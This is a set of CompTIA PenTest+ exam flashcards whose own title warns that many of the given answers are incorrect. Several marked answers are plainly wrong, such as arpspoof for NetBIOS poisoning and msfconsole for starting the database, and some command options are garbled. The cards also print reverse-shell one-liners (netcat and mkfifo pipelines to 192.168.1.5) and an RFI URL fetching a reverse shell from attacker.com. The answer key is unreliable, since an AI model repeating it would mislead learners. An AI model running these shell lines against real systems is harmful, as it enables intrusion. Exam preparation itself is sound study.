****DO NOT USE*** SO MANY INCORRECT ANSWERS ARE PROVIDED CompTIA Pentest PT0-001 (Exam Boost) Exam 1 Flashcards
A penetration tester has performed a security assessment for a startup firm.
The report lists a total of ten vulnerabilities, with five identified as critical.
The client does not have the resources to immediately remediate all vulnerabilities.
Under such circumstances, which of the following would be the BEST suggestion for the client?
A.Apply easy compensating controls for critical vulnerabilities to minimize the risk, and the re-prioritize remediation
B.Identify the issues that can be remediated most quickly and address them first
C.Implement the least impactful of the critical vulnerabilities remediation’s first and then address the other critical vulnerabilities
D.Fix the most critical vulnerability first, even if it means fixing the other vulnerabilities over extended period of time
D.Fix the most critical vulnerability first, even if it means fixing the other vulnerabilities over extended period of time
Which of the following is the reason why a pentester would run the following command at the end of an engagement? A.To remove the persistence B.To enable persistence C.To report persistence D.To check for persistence
A.To remove the persistence
A pentester wants to target NetBIOS name service.
Which of the following is the MOST Likely command to exploit the NetBIOS name service?
A.arpspoof
B.nmap
C.responder
D.burpsuite
A.arpspoof
A security consultant receives a document outlining the scope of an upcoming pentest.
This document contains IP addresses and times that each can be scanned.
Which of the following would contain this information? A.Rules of Engagement B.Request for Proposal C.Master Service Agreement D.Business Impact Analysis
A.Rules of Engagement
A pentester was able to an SQL injection commands into a text box and gain access to the information stored on the database.
Which of the following is the best recommendation that would mitigate the vulnerability?
A.Randomize the credentials used to log in.
B. Install host-based intrusion detection
C.Implement input normalization
D.Perform system hardening
C.Implement input normalization
Which of the following tools would a pentester use to conduct OSINT? A.Shodan B.SET C.BeEF D.Wireshark E.Maltego F.Dynamo
A.Shodan
E.Maltego
A pentester is performing ARP spoofing against a switch.
Which of the following should the pentester spoof to get the most information? A.MAC Address of the client B.MAC Address of the Domain Controller C.MAC address of the web server D.MAC address of the gateway
D.MAC address of the gateway
A pentester is able to move laterally throughout the domain with minimal roadblocks after compromising a single workstation.
Which of the following mitigation strategies would be BEST to recommend in the report?
(SELECT THREE)
A.Randomize local administrator credentials for each machine.
B.Disable remote logons for local administrators
C.Require multifactor authentication for all logins
D.Increase minimum password complexity requirements
E.Apply additional network access control
F.Enable Full-Disk Encryption on every workstation
G.Segment each host into its own VLAN
D.Increase minimum password complexity requirements
C.Require multifactor authentication for all logins
E.Apply additional network access control
A security consultant is trying to attack a device with a previously identified user account.
The consultation is utilizing metasploit SMB vulnerabilities and is able to dump hashes.
Which of the following types of attacks is being executed? A.Credential Dump Attack B.DLL Injection Attack C.Reverse Shell Attack D.Pass the hash attack
A.Credential Dump Attack
During a web application assessment, a pentester discovers that arbitrary commands can be executed on the server.
Wanting to take this attack one step further, the pentester begins to explore ways to gain a reverse shell back to the attack machine at 192.168.1.5.
Which of the following are possible ways to do so?
(CHOOSE TWO)
A.nc 192.168.1.5 44444
B.nc -nvlp 44444 -e /bin/sh
C. rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1| nc 192.168.1.5 444444 > /tmp/f
D.nc -e /bin/sh 192.168.1.5 44444
E. rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.5 444444 >/tmp/f
F.rm /tmpf;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.5.1 44444>/tmp/f
B.nc -nvlp 44444 -e /bin/sh
C. rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1| nc 192.168.1.5 444444 > /tmp/
Which of the following commands starts the Metasploit database? A.msfconsole B.workspace C.msfvenom D.db_init E.db_connect
A.msfconsole
A pentester is in the process of writing a report that outlines the overall level of risk to operations.
In which of the following areas of the report should the penetration tester put this? A.Appendixes B.Executive Summary C.Technical Summary D.Main Body
B.Executive Summary
A pentester identifies the following findings during an external vulnerability scan:
Vulnerability:
Multiple unsupported version of Apache found (Ports 80, 443)
SSLv3 accepted on HTTPS connections (443)
Mod_rewrite enabled on Apache servers (80,443)
Windows Server 2012 Host Found (21)
A.Obsolete software may contain exploitable components
B.Weak password management practices may be employed
C.Cryptographically weak protocols may be intercepted
D.Web server configurations may reveal sensitive information
D.Web server configurations may reveal sensitive information
Which of the following types of intrusion techniques is the use of an under-the-door tool during a physical security assessment an example of? A.Lockpicking B.Egress sensor triggering C.Lock bumping D.Lock bypass
D.Lock bypass
During a test, a critical vulnerability is discovered on a clients core server.
Which of the following should be the next action?
A.Disable the network port of the affected service
B.Complete all findings, and the submit them to the client
C.Promptly alert the client with details of the finding
D.Take the target offline so it cannot be exploited by an attacker
C.Promptly alert the client with details of the finding
A penetration tester has successfully deployed an evil twin and is starting to see some victim traffic.
The next step the pentester wants to take is to capture all the victim web traffic unencrypted.
Which of the following would meet this goal?
A.Perform an HTTP downgrade attack
B.Harvest the user credentials to decrypt traffic
C.Perform a MITM attack
D.Implement a CA attack by impersonating trusted CAs
A.Perform an HTTP downgrade attack
A pentester wants to script out a way to discover all the RPTR records for a range of IP address.
Which of the following is the MOST efficient to utilize?
A.nmap -p 53 -oG dnslist.txt | cut -d “;” -f4
B.nslookup -ns 8.8.8.8 «_space;dnslist.txt
C.for x in {1…254}; do dig -x 192.168.$x.$x;done
D.dig -r > echo “8.8.8.8”»_space; /etc/resolv.conf
D.dig -r > echo “8.8.8.8”»_space; /etc/resolv.conf
An engineer, who is conducting a pentest for a web application, discovers the user login process sends data using the HTTP get method.
To mitigate the risk of exposing sensitive information, the form should be sent using an:
A.HTTP POST method
B.HTTP OPTIONS method
C.HTTP PUT method
D.HTTP TRACE method
A.HTTP POST method
After gaining initial low-privilege access to a Linux system, a penetration tester identifies an interesting binary in a user’s home folder titled ‘changepass’
-sr-xr-x 1 root root 6443 Oct 18 2017 /home/user/changepass
Using string to print ASCII printable characters from changepass the tester notes the following:
$ strings changepass exit setuid strcmp GLIBC_ 2.0 ENV_PA TH %S/ changep w malloc strlen
Given this information, which of the following is the MOST likely path to exploitation to achieve root privileges on the machine?
A.Copy changepass to a writable directory and export the ENV_PATH environmental variable to the path of a token-stealing binary titled changepw. Then run changepass
B.Create a copy of changepass in the same directory naming it changepw. Export the ENV_PATH environment variable to the path ‘/home/user’. Then run changepass
C.Export the ENV_PATH environmental variable to the path of a writable directory that contains a token-stealing binary titled changepw. Then run changepass.
D.Run changepass within the current directory with sudo after exporting the ENV_PATH environmental variable to the path of ‘/usr/local/bin
D.Run changepass within the current directory with sudo after exporting the ENV_PATH environmental variable to the path of ‘/usr/local/bin
While monitoring WAF logs, a security analyst discovers a successful attack against the following URL:
https://example.com/index.php?Phone=http://attacker.com/badstuffhappens/revshell.php
Which of the following remediation steps should be taken to prevent this type of attack?
A.Implement a blacklist
B.Block URL Redirections
C.Double URL encode the parameters
D.Stop external calls from the application
D.Stop external calls from the application